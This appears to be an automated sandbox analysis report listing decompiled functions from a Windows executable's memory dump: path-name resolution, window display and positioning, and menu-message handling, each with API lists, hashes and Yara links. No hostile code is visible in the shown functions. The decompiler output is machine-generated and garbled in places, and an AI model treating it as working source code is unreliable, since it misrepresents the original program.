Opcode Fuzzy Hash: 1586025007dd4470d93438c7318bad5f77b42c0ccb86624fa12d6baefe806d8e
Instruction Fuzzy Hash: AFA11FF0A00660AFDB10EBB5FC86B293BE8EB45700391157AB915DF296D77C8850CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405304, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405304(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				struct _WIN32_FIND_DATAA _v346;
				char _v607;
				char* _t75;
				char* _t85;
				void* _t108;
				void* _t112;
				struct HINSTANCE__* _t114;
				void* _t115;
				void* _t116;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t114 = GetModuleHandleA("kernel32.dll");
				if(_t114 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_v20 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_v20 = E004052D8(_v8 + 2);
							if( *_v20 != 0) {
								_v20 = E004052D8(_v20 + 1);
								if( *_v20 != 0) {
									L10:
									_t108 = _v20 - _v8;
									_push(_t108 + 1);
									_push(_v8);
									_push( &_v607);
									L00401294();
									while( *_v20 != 0) {
										_v24 = E004052D8(_v20 + 1);
										_t112 = _v24 - _v20;
										if(_t112 + _t108 + 1 <= 0x105) {
											_push(_t112 + 1);
											_push(_v20);
											_push( &(( &_v607)[_t108]));
											L00401294();
											_t115 = FindFirstFileA( &_v607,  &_v346);
											if(_t115 != 0xffffffff) {
												FindClose(_t115);
												_t75 =  &(_v346.cFileName);
												_push(_t75);
												L0040129C();
												if(_t75 + _t108 + 1 + 1 <= 0x105) {
													 *((char*)(_t116 + _t108 - 0x25b)) = 0x5c;
													_push(0x105 - _t108 - 1);
													_push( &(_v346.cFileName));
													_push( &(( &(( &_v607)[_t108]))[1]));
													L00401294();
													_t85 =  &(_v346.cFileName);
													_push(_t85);
													L0040129C();
													_t108 = _t108 + _t85 + 1;
													_v20 = _v24;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v607);
									_push(_v8);
									L00401294();
								}
							}
						}
					}
				} else {
					_v28 = GetProcAddress(_t114, "GetLongPathNameA");
					if(_v28 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v607);
						_push(_v8);
						if(_v28() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v607);
							_push(_v8);
							L00401294();
						}
					}
				}
				L17:
				return _v16;
			}

0x00405310
0x00405313
0x00405319
0x00405326
0x0040532a
0x00405370
0x00405376
0x004053bf
0x00000000
0x00405378
0x0040537f
0x00405390
0x00405399
0x004053a8
0x004053b1
0x004053c2
0x004053c5
0x004053cb
0x004053cf
0x004053d6
0x004053d7
0x0040548c
0x004053ea
0x004053f0
0x004053fd
0x00405404
0x00405408
0x00405411
0x00405412
0x0040542a
0x0040542f
0x00405432
0x00405437
0x0040543d
0x0040543e
0x0040544e
0x00405450
0x00405460
0x00405467
0x00405471
0x00405472
0x00405477
0x0040547d
0x0040547e
0x00405484
0x00405489
0x00000000
0x00405489
0x0040544e
0x0040542f
0x00000000
0x004053fd
0x0040549b
0x004054a2
0x004054a6
0x004054a7
0x004054a7
0x004053b1
0x00405399
0x0040537f
0x0040532c
0x00405337
0x0040533e
0x00000000
0x00405340
0x00405340
0x0040534b
0x0040534f
0x00405355
0x00000000
0x00405357
0x0040535a
0x00405361
0x00405365
0x00405366
0x00405366
0x00405355
0x0040533e
0x004054ac
0x004054b5

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00405321
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405332
lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 00405366
lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 004053D7
lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 00405412
FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 00405425
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 00405432
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 0040543E
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 00405472
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 0040547E
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 004054A7

Strings

kernel32.dll, xrefs: 0040531C
GetLongPathNameA, xrefs: 0040532C
\, xrefs: 00405450

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 0bccf53ce06912585f4d454cb0f9b45e8ddf1df6ced01e200bf397d06449fc2d
Instruction ID: 4abf505d0fd40480f43a9e23195c8b305344f516f0769dd65b4bf46630b09724
Opcode Fuzzy Hash: 0bccf53ce06912585f4d454cb0f9b45e8ddf1df6ced01e200bf397d06449fc2d
Instruction Fuzzy Hash: 91512871D00658AFCB11DBE8CC85AEFB7B8EF48305F1405AAA514F7281D7789E808F68

Uniqueness

Uniqueness Score: -1.00%

Function 004475DC, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004475DC(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x447b46);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x47a10c; // 0x41abf4
					E00405DCC(_t294, 0,  &_v12);
					E0040B61C(_v12, 1);
					E00403BF4();
				}
				_t149 =  *0x47bb9c; // 0x2321704
				E0044BC68(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x447b29);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x447a30);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403674(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x47bba0; // 0x2321310
						_t127 = _t160 + 0x6c; // 0x0
						__eflags =  *_t127 - _v8;
						if( *_t127 == _v8) {
							__eflags = 0;
							E00446788(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043260C(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043260C(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E004423CC(E0043260C(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043260C(_v8), 0);
								} else {
									SetWindowPos(E0043260C(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043260C(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0042FB64(_v8);
						}
					} else {
						_push(_t372);
						_push(0x447694);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403674(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E00448E70() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00448E64() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x47bb9c; // 0x2321704
								_t31 = _t241 + 0x44; // 0x0
								_t305 = E0042B95C( *_t31) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x47bb9c; // 0x2321704
								_t34 = _t245 + 0x44; // 0x0
								_t248 = E0042B9A0( *_t34) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00445A30(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00448EA0() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00448E94() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x47bb9c; // 0x2321704
										_t82 = _t262 + 0x44; // 0x0
										_t311 = E0042B95C( *_t82) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x47bb9c; // 0x2321704
										_t85 = _t266 + 0x44; // 0x0
										_t269 = E0042B9A0( *_t85) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x47bb9c; // 0x2321704
								_t52 = _t270 + 0x44; // 0x0
								_t370 =  *_t52;
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x440ce4; // 0x440d30
									_t290 = E00403604( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E00448E70() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00448E64() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00445A30(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043260C(_v8),  *(0x479c1c + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043260C(_v8),  *(0x479c1c + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406684, E0043260C(_v8), 5, 0, _t220);
								E0042C17C();
							} else {
								_t231 = E0043260C(_v8);
								_t232 =  *0x47bb9c; // 0x2321704
								_t105 = _t232 + 0x44; // 0x0
								SendMessageA( *( *_t105 + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043260C(_v8), 3);
							}
							_t226 =  *0x47bb9c; // 0x2321704
							_t119 = _t226 + 0x44; // 0x0
							SendMessageA( *( *_t119 + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x447b30);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}

0x004475dd
0x004475df
0x004475e7
0x004475ea
0x004475ef
0x004475f0
0x004475f5
0x004475f8
0x00447602
0x00447613
0x00447618
0x00447627
0x0044762c
0x0044762c
0x00447631
0x00447636
0x0044763e
0x00447647
0x00447648
0x0044764d
0x00447650
0x0044765a
0x00447660
0x00447663
0x0044766a
0x00447a0e
0x00447a0f
0x00447a14
0x00447a17
0x00447a21
0x00447a2b
0x00447a47
0x00447a4c
0x00447a4f
0x00447a52
0x00447a54
0x00447a59
0x00447a59
0x00447a5e
0x00447a61
0x00447a68
0x00447a77
0x00447a7a
0x00447a81
0x00447aa2
0x00447aa7
0x00447aae
0x00447ab3
0x00447ab5
0x00447ac0
0x00447ac5
0x00447ac7
0x00447ad6
0x00447ad6
0x00447ac7
0x00447ad8
0x00447ada
0x00447b0c
0x00447adc
0x00447af4
0x00447afa
0x00447afa
0x00447a83
0x00447a9b
0x00447a9b
0x00447a6a
0x00447a6d
0x00447a6d
0x00447670
0x00447672
0x00447673
0x00447678
0x0044767b
0x00447685
0x0044768f
0x004476b5
0x004476e1
0x0044772a
0x0044772a
0x0044772d
0x0044772f
0x00447731
0x00447731
0x00447741
0x00447741
0x00447744
0x00447746
0x00447748
0x00447748
0x004476e3
0x004476e3
0x004476e8
0x004476f5
0x004476f8
0x004476fa
0x004476fc
0x004476fc
0x004476ff
0x00447704
0x0044770f
0x00447712
0x00447714
0x00447716
0x00447716
0x00447714
0x0044774d
0x0044774f
0x0044774f
0x00447753
0x00447755
0x00447755
0x00447765
0x0044776e
0x0044777b
0x00447784
0x00447784
0x0044778e
0x00447791
0x0044779c
0x0044779f
0x00447873
0x00447875
0x0044787b
0x0044787e
0x00447885
0x004478ce
0x004478ce
0x004478d1
0x004478d3
0x004478d5
0x004478d5
0x004478e5
0x004478e5
0x004478e8
0x004478ea
0x004478ec
0x004478ec
0x00447887
0x00447887
0x0044788c
0x00447899
0x00447899
0x0044789c
0x0044789e
0x004478a0
0x004478a0
0x004478a3
0x004478a8
0x004478b3
0x004478b3
0x004478b6
0x004478b8
0x004478ba
0x004478ba
0x004478b8
0x004478ef
0x004478f1
0x004478f3
0x004478f3
0x004478f3
0x004478f5
0x004478f7
0x004478f9
0x004478f9
0x004478f9
0x00447912
0x00447912
0x004477a5
0x004477a5
0x004477aa
0x004477aa
0x004477ad
0x004477b0
0x004477b7
0x004477bf
0x004477c5
0x004477ca
0x004477cc
0x004477d1
0x004477d1
0x004477cc
0x004477d4
0x004477d6
0x0044780f
0x0044780f
0x00447812
0x00447814
0x00447816
0x00447816
0x00447826
0x00447826
0x00447829
0x0044782b
0x0044782d
0x0044782d
0x004477d8
0x004477de
0x004477de
0x004477e1
0x004477e3
0x004477e5
0x004477e5
0x004477e8
0x004477f1
0x004477f1
0x004477f4
0x004477f6
0x004477f8
0x004477f8
0x004477fb
0x004477fb
0x00447830
0x00447832
0x00447834
0x00447834
0x00447834
0x00447836
0x00447838
0x0044783a
0x0044783a
0x0044783a
0x0044784a
0x00447853
0x00447859
0x0044785c
0x00447860
0x00447869
0x00447869
0x00447860
0x0044779f
0x0044791b
0x0044792c
0x00447a02
0x00447932
0x0044793c
0x0044798f
0x004479a3
0x004479a3
0x004479b8
0x004479c0
0x0044793e
0x00447943
0x0044794e
0x00447953
0x0044795d
0x0044796d
0x0044796d
0x004479ce
0x004479d3
0x004479dd
0x004479dd
0x0044792c
0x0044766a
0x00447b13
0x00447b16
0x00447b19
0x00447b1e
0x00447b21
0x00447b28

APIs

SendMessageA.USER32(?,00000223,00000000,00000000), ref: 0044795D

Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE

Strings

0D, xrefs: 004477BF

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: LoadMessageSendString
String ID: 0D
API String ID: 1946433856-523618118
Opcode ID: cfd0fa74f86a8363889c94e39ebaec32dfe22d6450ffb5d6d88c1b6367547e50
Instruction ID: 070d57332321567f0d22030d0b20f9c67e2048d062a29927bd93e730627b0cc6
Opcode Fuzzy Hash: cfd0fa74f86a8363889c94e39ebaec32dfe22d6450ffb5d6d88c1b6367547e50
Instruction Fuzzy Hash: DEF13E30A14244EFEB00EBA9C985F5E77F5EB04304F6544B6E504A73A2D779BE42DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00432878, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00432878(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E0042B5AC(_t43);
			}

0x0043287b
0x0043287e
0x0043288e
0x004328bd
0x00432890
0x00432890
0x004328a4
0x004328af
0x004328b0
0x004328b1
0x004328b2
0x004328b2
0x004328d5
0x004328e5
0x004328e9
0x004328ed
0x004328f8
0x004328f8
0x004328e9
0x00432900
0x00432907
0x00432911
0x0043291c
0x0043292c

APIs

IsIconic.USER32(?), ref: 00432887
GetWindowPlacement.USER32(?,0000002C), ref: 004328A4
GetWindowRect.USER32(?), ref: 004328BD
GetWindowLongA.USER32(?,000000F0), ref: 004328CB
GetWindowLongA.USER32(?,000000F8), ref: 004328E0
ScreenToClient.USER32(00000000), ref: 004328ED
ScreenToClient.USER32(00000000,?), ref: 004328F8

Strings

,, xrefs: 00432890

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 6e5cd744639d8d7ccc808a1d290235ba1e55158d8b2adbc38bcc9d0976e4c0cd
Instruction ID: f98955ee0371010510501b7f5a39e29b8fbc353eb4e0254aa9676f90055cba17
Opcode Fuzzy Hash: 6e5cd744639d8d7ccc808a1d290235ba1e55158d8b2adbc38bcc9d0976e4c0cd
Instruction Fuzzy Hash: 6A117C72501201AFCB01EF6DC881E9B77E8AF0C314F04463AFD58DB286DB39D9048BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0043F83C, Relevance: 9.4, APIs: 6, Instructions: 405
nativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0043F83C(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x43fd6f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0043EBB8(E00413E68(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x479fc4; // 0x47bb9c
								E0044BB78( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00413E68(_v8, _t368);
									_t295 = _v17;
									_v16 = E0043EAFC(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E004290BC( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x479fc4; // 0x47bb9c
								E0044BB78( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00413E68(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0043EAFC(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0043F42C(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E00413E68(_v8, _t370);
								_t181 = E0043EB9C( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0043EAFC(E00413E68(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041D184(0, 1);
								_push(_t377);
								_push(0x43fba2);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x43fb85);
